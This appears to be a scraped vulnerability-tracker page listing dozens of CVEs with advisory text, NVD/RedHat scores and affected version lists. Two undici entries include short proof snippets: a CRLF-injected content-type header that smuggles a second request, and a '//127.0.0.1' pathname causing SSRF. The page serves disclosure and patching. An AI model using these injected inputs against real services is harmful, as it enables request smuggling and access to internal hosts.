            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-23936Undici is an HTTP/1.1 client for Node.js. Starting with version 2.0.0 and prior to version 5.19.1, the undici library does not protect `host` HTTP header from CRLF injection vulnerabilities. This issue is patched in Undici v5.19.1. As a workaround, sanitize the `headers.host` string before passing to undici.MEDIUM

            NVD: 5.4

            RedHat: 6.5

            • 8.6.2
            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-45142The fix for CVE-2022-3437 included changing memcmp to be constant time and a workaround for a compiler bug by adding "!= 0" comparisons to the result of memcmp. When these patches were backported to the heimdal-7.7.1 and heimdal-7.8.0 branches (and possibly other branches) a logic inversion sneaked in causing the validation of message integrity codes in gssapi/arcfour to be inverted.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-42898PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."MEDIUM

            NVD: 8.8

            RedHat: 8.8

            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-4304A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.MEDIUM

            NVD: 5.9

            RedHat: 5.9

            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-4450The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2023-0215The public API function BIO_new_NDEF is a helper function used for streaming ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by end user applications. The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter BIO onto the front of it to form a BIO chain, and then returns the new head of the BIO chain to the caller. Under certain conditions, for example if a CMS recipient public key is invalid, the new filter BIO is freed and the function returns a NULL result indicating a failure. However, in this case, the BIO chain is not properly cleaned up and the BIO passed by the caller still retains internal pointers to the previously freed filter BIO. If the caller then goes on to call BIO_pop() on the BIO then a use-after-free will occur. This will most likely result in a crash. This scenario occurs directly in the internal function B64_write_ASN1() which may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on the BIO. This internal function is in turn called by the public API functions PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. Other public API functions that may be impacted by this include i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and i2d_PKCS7_bio_stream. The OpenSSL cms and smime command line applications are similarly affected.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-23540In versions `<=8.5.1` of `jsonwebtoken` library, lack of algorithm definition in the `jwt.verify()` function can lead to signature validation bypass due to defaulting to the `none` algorithm for signature verification. Users are affected if you do not specify algorithms in the `jwt.verify()` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the `jwt.verify()` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the `none` algorithm. If you need 'none' algorithm, you have to explicitly specify that in `jwt.verify()` options.MEDIUM

            NVD: 7.6

            RedHat: 6.4

            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-23541jsonwebtoken is an implementation of JSON Web Tokens. Versions `<= 8.5.1` of `jsonwebtoken` library can be misconfigured so that passing a poorly implemented key retrieval function referring to the `secretOrPublicKey` argument from the readme link will result in incorrect verification of tokens. There is a possibility of using a different algorithm and key combination in verification, other than the one that was used to sign the tokens. Specifically, tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm. This can lead to successful validation of forged tokens. If your application is supporting usage of both symmetric key and asymmetric key in jwt.verify() implementation with the same key retrieval function. This issue has been patched, please update to version 9.0.0.MEDIUM

            NVD: 6.3

            RedHat: 5

            • 8.6.1
            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-43552A use after free vulnerability exists in curl <7.87.0. Curl can be asked to *tunnel* virtually all protocols it supports through an HTTP proxy. HTTP proxies can (and often do) deny such tunnel operations. When getting denied to tunnel the specific protocols SMB or TELNET, curl would use a heap-allocated struct after it had been freed, in its transfer shutdown code path.MEDIUM

            NVD: 5.9

            RedHat: 5.9

            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2021-44758Heimdal before 7.7.1 allows attackers to cause a NULL pointer dereference in a SPNEGO acceptor via a preferred_mech_type of GSS_C_NO_OID and a nonzero initial_response value to send_accept.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-3437A heap-based buffer overflow vulnerability was found in Samba within the GSSAPI unwrap_des() and unwrap_des3() routines of Heimdal. The DES and Triple-DES decryption routines in the Heimdal GSSAPI library allow a length-limited write buffer overflow on malloc() allocated memory when presented with a maliciously small packet. This flaw allows a remote user to send specially crafted malicious data to the application, possibly resulting in a denial of service (DoS) attack.MEDIUM

            NVD: 6.5

            RedHat: 5.9

            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-44640Heimdal before 7.7.1 allows remote attackers to execute arbitrary code because of an invalid free in the ASN.1 codec used by the Key Distribution Center (KDC).MEDIUM

            NVD: 9.8

            RedHat: n/a

            • 8.6.0
            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-23491Certifi is a curated collection of Root Certificates for validating the trustworthiness of SSL certificates while verifying the identity of TLS hosts. Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 8.4.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-41916Heimdal is an implementation of ASN.1/DER, PKIX, and Kerberos. Versions prior to 7.7.1 are vulnerable to a denial of service vulnerability in Heimdal's PKI certificate validation library, affecting the KDC (via PKINIT) and kinit (via PKINIT), as well as any third-party applications using Heimdal's libhx509. Users should upgrade to Heimdal 7.7.1 or 7.8. There are no known workarounds for this issue.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 8.5.3
            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 8.4.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-40674libexpat before 2.4.9 has a use-after-free in the doContent function in xmlparse.c.MEDIUM

            NVD: 8.1

            RedHat: 8.1

            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 8.4.3
            • 8.4.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-43680In libexpat through 2.4.9, there is a use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate in out-of-memory situations.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.5.2
            • 8.5.1
            • 8.5.0
            • 8.4.3
            • 8.4.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-32221When doing HTTP(S) transfers, libcurl might erroneously use the read callback (`CURLOPT_READFUNCTION`) to ask for data to send, even when the `CURLOPT_POSTFIELDS` option has been set, if the same handle previously was used to issue a `PUT` request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent `POST` request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST.MEDIUM

            NVD: 9.8

            RedHat: 4.8

            • 8.5.0
            • 8.4.3
            • 8.4.2
            • 8.4.1
            • 8.4.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-35737SQLite 1.0.12 through 3.39.x before 3.39.2 sometimes allows an array-bounds overflow if billions of bytes are used in a string argument to a C API.MEDIUM

            NVD: 7.5

            RedHat: 5.9

            • 8.5.0
            • 8.4.3
            • 8.4.2
            • 8.4.1
            • 8.4.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-3116The Heimdal Software Kerberos 5 implementation is vulnerable to a null pointer dereferance. An attacker with network access to an application that depends on the vulnerable code path can cause the application to crash.MEDIUM

            NVD: 7.5

            RedHat: n/a

            • 8.4.3
            • 8.4.2
            • 8.4.1
            • 8.4.0
            • 8.3.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2020-16156CPAN 2.28 allows Signature Verification Bypass.MEDIUM

            NVD: 7.8

            RedHat: 7.8

            • 8.4.3
            • 8.4.2
            • 8.4.1
            • 8.4.0
            • 8.3.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-37434zlib through 1.2.12 has a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field. NOTE: only applications that call inflateGetHeader are affected. Some common applications bundle the affected zlib source code but may be unable to call inflateGetHeader (e.g., see the nodejs/node reference).MEDIUM

            NVD: 9.8

            RedHat: 7

            • 8.4.3
            • 8.4.2
            • 8.4.1
            • 8.4.0
            • 8.3.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2020-35525In SQlite 3.31.1, a potential null pointer derreference was found in the INTERSEC query processing.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.4.2
            • 8.4.1
            • 8.4.0
            • 8.3.3
            • 8.3.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2020-35527In SQLite 3.31.1, there is an out of bounds access problem through ALTER TABLE for views that have a nested FROM clause.MEDIUM

            NVD: 9.8

            RedHat: 8.1

            • 8.4.2
            • 8.4.1
            • 8.4.0
            • 8.3.3
            • 8.3.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-31150undici is an HTTP/1.1 client, written from scratch for Node.js. It is possible to inject CRLF sequences into request headers in undici in versions less than 5.7.1. A fix was released in version 5.8.0. Sanitizing all HTTP headers from untrusted sources to eliminate `\r\n` is a workaround for this issue.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.4.0
            • 8.3.3
            • 8.3.2
            • 8.3.1
            • 8.3.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-35948undici is an HTTP/1.1 client, written from scratch for Node.js.`=< undici@5.8.0` users are vulnerable to _CRLF Injection_ on headers when using unsanitized input as request headers, more specifically, inside the `content-type` header. Example: ``` import { request } from 'undici' const unsanitizedContentTypeInput = 'application/json\r\n\r\nGET /foo2 HTTP/1.1' await request('http://localhost:3000, { method: 'GET', headers: { 'content-type': unsanitizedContentTypeInput }, }) ``` The above snippet will perform two requests in a single `request` API call: 1) `http://localhost:3000/` 2) `http://localhost:3000/foo2` This issue was patched in Undici v5.8.1. Sanitize input when sending content-type headers using user input as a workaround.MEDIUM

            NVD: 5.3

            RedHat: 5.3

            • 8.4.0
            • 8.3.3
            • 8.3.2
            • 8.3.1
            • 8.3.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-35949undici is an HTTP/1.1 client, written from scratch for Node.js.`undici` is vulnerable to SSRF (Server-side Request Forgery) when an application takes in **user input** into the `path/pathname` option of `undici.request`. If a user specifies a URL such as `http://127.0.0.1` or `//127.0.0.1` ```js const undici = require("undici") undici.request({origin: "http://example.com", pathname: "//127.0.0.1"}) ``` Instead of processing the request as `http://example.org//127.0.0.1` (or `http://example.org/http://127.0.0.1` when `http://127.0.0.1 is used`), it actually processes the request as `http://127.0.0.1/` and sends it to `http://127.0.0.1`. If a developer passes in user input into `path` parameter of `undici.request`, it can result in an _SSRF_ as they will assume that the hostname cannot change, when in actual fact it can change because the specified path parameter is combined with the base URL. This issue was fixed in `undici@5.8.1`. The best workaround is to validate user input before passing it to the `undici.request` call.MEDIUM

            NVD: 9.8

            RedHat: 5.3

            • 8.4.0
            • 8.3.3
            • 8.3.2
            • 8.3.1
            • 8.3.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-2509A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.3.3
            • 8.3.2
            • 8.3.1
            • 8.3.0
            • 8.2.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-27404FreeType commit 1e2eb65048f75c64b68708efed6ce904c31f3b2f was discovered to contain a heap buffer overflow via the function sfnt_init_face.MEDIUM

            NVD: 9.8

            RedHat: 7.6

            • 8.3.2
            • 8.3.1
            • 8.3.0
            • 8.2.3
            • 8.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-31782ftbench.c in FreeType Demo Programs through 2.12.1 has a heap-based buffer overflow.MEDIUM

            NVD: 7.8

            RedHat: n/a

            • 8.3.2
            • 8.3.1
            • 8.3.0
            • 8.2.3
            • 8.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-34480Within the <code>lg_init()</code> function, if several allocations succeed but then one fails, an uninitialized pointer would have been freed despite never being allocated. This vulnerability affects Firefox < 102.MEDIUM

            NVD: 8.8

            RedHat: 7

            • 8.3.2
            • 8.3.1
            • 8.3.0
            • 8.2.3
            • 8.2.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-34903GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.MEDIUM

            NVD: 6.5

            RedHat: 5.9

            • 8.3.1
            • 8.3.0
            • 8.2.3
            • 8.2.2
            • 8.2.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-2097AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).MEDIUM

            NVD: 5.3

            RedHat: 5.3

            • 8.3.1
            • 8.3.0
            • 8.2.3
            • 8.2.2
            • 8.2.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-32206curl < 7.84.0 supports "chained" HTTP compression algorithms, meaning that a serverresponse can be compressed multiple times and potentially with different algorithms. The number of acceptable "links" in this "decompression chain" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.The use of such a decompression chain could result in a "malloc bomb", makingcurl end up spending enormous amounts of allocated heap memory, or trying toand returning out of memory errors.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.3.0
            • 8.2.3
            • 8.2.2
            • 8.2.1
            • 8.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-32208When curl < 7.84.0 does FTP transfers secured by krb5, it handles message verification failures wrongly. This flaw makes it possible for a Man-In-The-Middle attack to go unnoticed and even allows it to inject data to the client.MEDIUM

            NVD: 5.9

            RedHat: 5.3

            • 8.3.0
            • 8.2.3
            • 8.2.2
            • 8.2.1
            • 8.2.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-2068In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).MEDIUM

            NVD: 7.3

            RedHat: 6.7

            • 8.2.3
            • 8.2.2
            • 8.2.1
            • 8.2.0
            • 8.1.3
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-1664Dpkg::Source::Archive in dpkg, the Debian package management system, before version 1.21.8, 1.20.10, 1.19.8, 1.18.26 is prone to a directory traversal vulnerability. When extracting untrusted source packages in v2 and v3 source package formats that include a debian.tar, the in-place extraction can lead to directory traversal situations on specially crafted orig.tar and debian.tar tarballs.MEDIUM

            NVD: 9.8

            RedHat: n/a

            • 8.2.2
            • 8.2.1
            • 8.2.0
            • 8.1.3
            • 8.1.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-1304An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.MEDIUM

            NVD: 7.8

            RedHat: 5.8

            • 8.2.2
            • 8.2.1
            • 8.2.0
            • 8.1.3
            • 8.1.2
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-22576An improper authentication vulnerability exists in curl 7.33.0 to and including 7.82.0 which might allow reuse OAUTH2-authenticated connections without properly making sure that the connection was authenticated with the same credentials as set for this transfer. This affects SASL-enabled protocols: SMPTP(S), IMAP(S), POP3(S) and LDAP(S) (openldap only).MEDIUM

            NVD: 8.1

            RedHat: 8.1

            • 8.2.0
            • 8.1.3
            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-27774An insufficiently protected credentials vulnerability exists in curl 4.9 to and include curl 7.82.0 are affected that could allow an attacker to extract credentials when follows HTTP(S) redirects is used with authentication could leak credentials to other services that exist on different protocols or port numbers.MEDIUM

            NVD: 5.7

            RedHat: 5

            • 8.2.0
            • 8.1.3
            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-27782libcurl would reuse a previously created connection even when a TLS or SSHrelated option had been changed that should have prohibited reuse.libcurl keeps previously used connections in a connection pool for subsequenttransfers to reuse if one of them matches the setup. However, several TLS andSSH settings were left out from the configuration match checks, making themmatch too easily.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.2.0
            • 8.1.3
            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-29155In OpenLDAP 2.x before 2.5.12 and 2.6.x before 2.6.2, a SQL injection vulnerability exists in the experimental back-sql backend to slapd, via a SQL statement within an LDAP query. This can occur during an LDAP search operation when the search filter is processed, due to a lack of proper escaping.MEDIUM

            NVD: 9.8

            RedHat: 6.5

            • 8.2.0
            • 8.1.3
            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-1292The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).MEDIUM

            NVD: 7.3

            RedHat: 6.7

            • 8.2.0
            • 8.1.3
            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-21670markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.MEDIUM

            NVD: 5.3

            RedHat: n/a

            • 8.1.3
            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 8.0.1
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-1271An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.MEDIUM

            NVD: 8.8

            RedHat: 8.8

            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2018-25032zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.MEDIUM

            NVD: 7.5

            RedHat: 8.2

            • 8.1.2
            • 8.1.1
            • 8.1.0
            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2020-28500Lodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.MEDIUM

            NVD: 5.3

            RedHat: 5.3

            • 8.1.1
            • 8.1.0
            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-24773Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.3.0, RSA PKCS#1 v1.5 signature verification code does not properly check `DigestInfo` for a proper ASN.1 structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest. The issue has been addressed in `node-forge` version 1.3.0. There are currently no known workarounds.MEDIUM

            NVD: 5.3

            RedHat: 5.3

            • 8.1.1
            • 8.1.0
            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-25313In Expat (aka libexpat) before 2.4.5, an attacker can trigger stack exhaustion in build_model via a large nesting depth in the DTD element.MEDIUM

            NVD: 6.5

            RedHat: 6.5

            • 8.1.0
            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-25314In Expat (aka libexpat) before 2.4.5, there is an integer overflow in copyString.MEDIUM

            NVD: 7.5

            RedHat: 7.5

            • 8.1.0
            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-25315In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames.MEDIUM

            NVD: 9.8

            RedHat: 9.8

            • 8.1.0
            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2021-3999A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.MEDIUM

            NVD: 7.8

            RedHat: 7.4

            • 8.0.1
            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2021-3995A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.MEDIUM

            NVD: 5.5

            RedHat: 4.7

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2021-3996A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems.MEDIUM

            NVD: 5.5

            RedHat: 5.5

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2021-46143In doProlog in xmlparse.c in Expat (aka libexpat) before 2.4.3, an integer overflow exists for m_groupSize.MEDIUM

            NVD: 7.8

            RedHat: 7.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-22822addBinding in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.MEDIUM

            NVD: 9.8

            RedHat: 9.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-22823build_model in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.MEDIUM

            NVD: 9.8

            RedHat: 9.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-22824defineAttribute in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.MEDIUM

            NVD: 9.8

            RedHat: 9.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-22825lookup in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.MEDIUM

            NVD: 8.8

            RedHat: 8.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-22826nextScaffoldPart in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.MEDIUM

            NVD: 8.8

            RedHat: 8.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
